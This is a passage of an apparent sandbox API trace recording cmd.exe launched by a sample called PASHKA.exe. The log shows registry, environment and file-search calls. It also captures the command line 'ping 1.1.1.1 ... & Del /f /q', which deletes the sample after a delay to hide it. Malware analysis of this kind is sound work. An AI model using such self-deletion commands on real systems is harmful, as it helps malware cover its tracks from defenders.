lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x4, lpData=0x6fed04*=0x40, lpcbData=0x6fecfc*=0x4) returned 0x0 [0045.009] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x0, lpData=0x6fed04*=0x40, lpcbData=0x6fecfc*=0x1000) returned 0x2 [0045.010] RegCloseKey (hKey=0xcc) returned 0x0 [0045.010] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x6fecf8 | out: phkResult=0x6fecf8*=0xcc) returned 0x0 [0045.010] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x0, lpData=0x6fed04*=0x40, lpcbData=0x6fecfc*=0x1000) returned 0x2 [0045.010] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x4, lpData=0x6fed04*=0x1, lpcbData=0x6fecfc*=0x4) returned 0x0 [0045.010] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x0, lpData=0x6fed04*=0x1, lpcbData=0x6fecfc*=0x1000) returned 0x2 [0045.010] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x4, lpData=0x6fed04*=0x0, lpcbData=0x6fecfc*=0x4) returned 0x0 [0045.010] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x4, lpData=0x6fed04*=0x9, lpcbData=0x6fecfc*=0x4) returned 0x0 [0045.010] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x4, lpData=0x6fed04*=0x9, lpcbData=0x6fecfc*=0x4) returned 0x0 [0045.010] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x6fed00, lpData=0x6fed04, lpcbData=0x6fecfc*=0x1000 | out: lpType=0x6fed00*=0x0, lpData=0x6fed04*=0x9, lpcbData=0x6fecfc*=0x1000) returned 0x2 [0045.010] RegCloseKey (hKey=0xcc) returned 0x0 [0045.010] time (in: timer=0x0 | out: timer=0x0) returned 0x5e16d3c6 [0045.010] srand (_Seed=0x5e16d3c6) [0045.010] GetCommandLineW () returned="cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe\"" [0045.010] malloc (_Size=0x4000) returned 0xbb21f0 [0045.011] GetCommandLineW () returned="cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe\"" [0045.011] malloc (_Size=0xffce) returned 0xa30048 [0045.011] ??_V@YAXPAX@Z () returned 0x6ffcdc [0045.012] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0xa30048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0045.013] malloc (_Size=0xffce) returned 0xa40020 [0045.013] ??_V@YAXPAX@Z () returned 0x6ffab0 [0045.014] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa40020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0045.014] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd5f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0045.014] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd5f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.014] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd5f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0045.014] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0045.014] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0045.014] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0045.014] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0045.014] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0045.014] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0045.014] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0045.014] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0045.014] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0045.015] GetProcessHeap () returned 0x760000 [0045.015] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x7656d8) returned 1 [0045.015] GetEnvironmentStringsW () returned 0x764c00* [0045.015] GetProcessHeap () returned 0x760000 [0045.015] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xae2) returned 0x767778 [0045.015] FreeEnvironmentStringsA (penv="A") returned 1 [0045.015] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd5f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0045.015] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd5f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0045.015] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0045.015] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0045.015] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0045.015] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0045.015] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0045.015] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0045.015] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0045.015] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0045.015] malloc (_Size=0xffce) returned 0xa4fff8 [0045.015] ??_V@YAXPAX@Z () returned 0x6ff848 [0045.016] GetProcessHeap () returned 0x760000 [0045.016] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x38) returned 0x760ae0 [0045.016] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0xa4fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0045.016] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0xa4fff8, lpFilePart=0x6ff894 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x6ff894*="Desktop") returned 0x17 [0045.016] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0045.017] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x6ff618 | out: lpFindFileData=0x6ff618*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x760b20 [0045.017] FindClose (in: hFindFile=0x760b20 | out: hFindFile=0x760b20) returned 1 [0045.017] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x6ff618 | out: lpFindFileData=0x6ff618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x760b20 [0045.017] FindClose (in: hFindFile=0x760b20 | out: hFindFile=0x760b20) returned 1 [0045.017] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x6ff618 | out: lpFindFileData=0x6ff618*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xee51aacf, ftLastAccessTime.dwHighDateTime=0x1d5c6bc, ftLastWriteTime.dwLowDateTime=0xee51aacf, ftLastWriteTime.dwHighDateTime=0x1d5c6bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x760b20 [0045.017] FindClose (in: hFindFile=0x760b20 | out: hFindFile=0x760b20) returned 1 [0045.017] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0045.017] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0045.018] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0045.018] GetProcessHeap () returned 0x760000 [0045.018] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x767778) returned 1 [0045.018] GetEnvironmentStringsW () returned 0x764c00* [0045.018] GetProcessHeap () returned 0x760000 [0045.018] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb1a) returned 0x766c88 [0045.018] FreeEnvironmentStringsA (penv="=") returned 1 [0045.018] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0xa30048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0045.018] GetProcessHeap () returned 0x760000 [0045.018] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x760ae0) returned 1 [0045.018] ??_V@YAXPAX@Z () returned 0x1 [0045.018] ??_V@YAXPAX@Z () returned 0x1 [0045.018] GetProcessHeap () returned 0x760000 [0045.018] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x400e) returned 0x768d90 [0045.018] GetProcessHeap () returned 0x760000 [0045.018] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xae) returned 0x7677b0 [0045.018] GetProcessHeap () returned 0x760000 [0045.018] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x768d90) returned 1 [0045.018] GetConsoleOutputCP () returned 0x1b5 [0045.021] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd63850 | out: lpCPInfo=0xd63850) returned 1 [0045.021] GetUserDefaultLCID () returned 0x409 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd5f82c, cchData=8 | out: lpLCData=":") returned 2 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x6ffc04, cchData=128 | out: lpLCData="0") returned 2 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x6ffc04, cchData=128 | out: lpLCData="0") returned 2 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x6ffc04, cchData=128 | out: lpLCData="1") returned 2 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd5f81c, cchData=8 | out: lpLCData="/") returned 2 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd5f7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd5f778, cchData=32 | out: lpLCData="Tue") returned 4 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd5f738, cchData=32 | out: lpLCData="Wed") returned 4 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd5f6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd5f6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd5f678, cchData=32 | out: lpLCData="Sat") returned 4 [0045.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd5f638, cchData=32 | out: lpLCData="Sun") returned 4 [0045.023] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd5f80c, cchData=8 | out: lpLCData=".") returned 2 [0045.023] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd5f7f8, cchData=8 | out: lpLCData=",") returned 2 [0045.023] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0045.025] GetProcessHeap () returned 0x760000 [0045.025] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20c) returned 0x7678b0 [0045.025] GetConsoleTitleW (in: lpConsoleTitle=0x7678b0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0045.026] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0045.027] GetProcAddress (hModule=0x74030000, lpProcName="CopyFileExW") returned 0x74044330 [0045.027] GetProcAddress (hModule=0x74030000, lpProcName="IsDebuggerPresent") returned 0x74045930 [0045.027] GetProcAddress (hModule=0x74030000, lpProcName="SetConsoleInputExeNameW") returned 0x772c09d0 [0045.027] ??_V@YAXPAX@Z () returned 0x1 [0045.028] GetProcessHeap () returned 0x760000 [0045.028] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x400a) returned 0x768d90 [0045.028] GetProcessHeap () returned 0x760000 [0045.028] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x768d90) returned 1 [0045.028] _wcsicmp (_String1="ping", _String2=")") returned 71 [0045.028] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0045.028] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0045.028] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0045.028] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0045.028] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0045.028] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0045.028] GetProcessHeap () returned 0x760000 [0045.028] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x58) returned 0x767ac8 [0045.028] GetProcessHeap () returned 0x760000 [0045.028] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x12) returned 0x767b28 [0045.029] GetProcessHeap () returned 0x760000 [0045.029] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x36) returned 0x767b48 [0045.029] GetProcessHeap () returned 0x760000 [0045.029] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x20) returned 0x767b88 [0045.029] GetProcessHeap () returned 0x760000 [0045.029] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x767bb0 [0045.030] GetProcessHeap () returned 0x760000 [0045.030] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x38) returned 0x767bc8 [0045.030] GetProcessHeap () returned 0x760000 [0045.030] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x58) returned 0x767c08 [0045.031] _wcsicmp (_String1="Del", _String2=")") returned 59 [0045.031] _wcsicmp (_String1="FOR", _String2="Del") returned 2 [0045.031] _wcsicmp (_String1="FOR/?", _String2="Del") returned 2 [0045.031] _wcsicmp (_String1="IF", _String2="Del") returned 5 [0045.031] _wcsicmp (_String1="IF/?", _String2="Del") returned 5 [0045.031] _wcsicmp (_String1="REM", _String2="Del") returned 14 [0045.031] _wcsicmp (_String1="REM/?", _String2="Del") returned 14 [0045.031] GetProcessHeap () returned 0x760000 [0045.031] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x58) returned 0x767c68 [0045.031] GetProcessHeap () returned 0x760000 [0045.031] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x767cc8 [0045.032] GetProcessHeap () returned 0x760000 [0045.032] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x60) returned 0x767ce0 [0045.032] malloc (_Size=0xffce) returned 0xa42670 [0045.033] ??_V@YAXPAX@Z () returned 0x6ffa5c [0045.033] GetProcessHeap () returned 0x760000 [0045.033] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x767d48 [0045.033] _get_osfhandle (_FileHandle=1) returned 0x90 [0045.033] _get_osfhandle (_FileHandle=1) returned 0x90 [0045.033] _get_osfhandle (_FileHandle=1) returned 0x90 [0045.033] GetFileType (hFile=0x90) returned 0x2 [0045.033] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0045.033] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x6ffa84 | out: lpMode=0x6ffa84) returned 1 [0045.046] _dup (_FileHandle=1) returned 3 [0045.052] _close (_FileHandle=1) returned 0 [0045.052] _wcsicmp (_String1="Nul", _String2="con") returned 11 [0045.052] CreateFileW (lpFileName="Nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x6ffa60, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0045.053] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 1 [0045.053] ??_V@YAXPAX@Z () returned 0x1 [0045.053] GetConsoleTitleW (in: lpConsoleTitle=0x6ffa98, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0045.056] malloc (_Size=0xffce) returned 0xa42670 [0045.056] ??_V@YAXPAX@Z () returned 0x6ff824 [0045.056] malloc (_Size=0xffce) returned 0xa52648 [0045.057] ??_V@YAXPAX@Z () returned 0x6ff5dc [0045.064] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0045.072] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0045.075] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0045.075] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0045.075] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0045.075] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0045.075] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0045.075] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0045.075] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0045.075] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0045.076] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0045.076] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0045.076] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0045.098] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0045.098] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0045.098] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0045.098] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0045.098] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0045.098] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0045.098] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0045.098] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0045.098] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0045.098] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0045.098] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0045.098] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0045.098] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0045.098] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0045.098] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0045.098] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0045.098] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0045.098] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0045.098] _wcsicmp (_String1="ping", _String2="START") returned -3 [0045.098] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0045.098] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0045.098] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0045.098] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0045.098] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0045.098] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0045.098] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0045.098] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0045.098] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0045.098] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0045.099] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0045.099] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0045.099] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0045.099] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0045.099] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0045.099] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0045.099] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0045.099] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0045.099] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0045.099] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0045.099] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0045.099] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0045.099] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0045.099] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0045.099] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0045.099] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0045.099] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0045.099] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0045.099] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0045.099] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0045.099] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0045.099] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0045.099] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0045.099] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0045.099] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0045.099] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0045.099] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0045.099] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0045.099] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0045.099] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0045.099] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0045.099] _wcsicmp (_String1="ping", _String2="START") returned -3 [0045.099] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0045.099] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0045.099] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0045.099] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0045.099] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0045.099] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0045.099] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0045.100] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0045.100] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0045.100] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0045.100] _wcsicmp (_String1="ping", _String2="FOR") returned 10 [0045.100] _wcsicmp (_String1="ping", _String2="IF") returned 7 [0045.100] _wcsicmp (_String1="ping", _String2="REM") returned -2 [0045.100] ??_V@YAXPAX@Z () returned 0x1 [0045.100] GetProcessHeap () returned 0x760000 [0045.100] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xffd6) returned 0x768d90 [0045.101] GetProcessHeap () returned 0x760000 [0045.101] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x42) returned 0x767d68 [0045.101] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0045.101] malloc (_Size=0xffce) returned 0xa52648 [0045.101] ??_V@YAXPAX@Z () returned 0x6ff35c [0045.101] GetProcessHeap () returned 0x760000 [0045.101] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1ffa4) returned 0x778d70 [0045.103] SetErrorMode (uMode=0x0) returned 0x0 [0045.103] SetErrorMode (uMode=0x1) returned 0x0 [0045.103] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x778d78, lpFilePart=0x6ff37c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x6ff37c*="Desktop") returned 0x17 [0045.103] SetErrorMode (uMode=0x0) returned 0x1 [0045.103] GetProcessHeap () returned 0x760000 [0045.103] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x778d70, Size=0x42) returned 0x778d70 [0045.103] GetProcessHeap () returned 0x760000 [0045.103] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x778d70) returned 0x42 [0045.103] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd5f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0045.103] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.103] GetProcessHeap () returned 0x760000 [0045.103] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1b4) returned 0x767db8 [0045.103] GetProcessHeap () returned 0x760000 [0045.103] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x360) returned 0x760ae0 [0045.111] GetProcessHeap () returned 0x760000 [0045.111] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x760ae0, Size=0x1b6) returned 0x760ae0 [0045.112] GetProcessHeap () returned 0x760000 [0045.112] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x760ae0) returned 0x1b6 [0045.112] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd5f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.112] GetProcessHeap () returned 0x760000 [0045.112] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe0) returned 0x767f78 [0045.112] GetProcessHeap () returned 0x760000 [0045.112] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x767f78, Size=0x76) returned 0x767f78 [0045.112] GetProcessHeap () returned 0x760000 [0045.112] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x767f78) returned 0x76 [0045.112] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.113] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x6ff108, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff108) returned 0xffffffff [0045.113] GetLastError () returned 0x2 [0045.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.113] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x6ff108, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff108) returned 0xffffffff [0045.116] GetLastError () returned 0x2 [0045.116] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.116] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\ping.*", 